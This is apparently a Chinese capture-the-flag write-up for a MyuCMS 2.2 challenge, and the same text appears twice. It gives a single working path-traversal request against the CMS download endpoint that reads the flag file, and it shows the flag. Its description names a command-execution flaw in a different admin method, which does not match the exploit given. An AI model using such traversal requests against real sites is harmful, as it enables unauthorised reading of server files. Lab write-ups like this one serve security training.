一、题目
靶标介绍:
MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.
进入题目:
exp:
url/index.php/bbs/index/download?url=../../../../../flag&local=1&name
查看flag:
flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}
靶标介绍:
MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.
进入题目:
exp:
url/index.php/bbs/index/download?url=../../../../../flag&local=1&name
查看flag:
flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/88844.html
如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!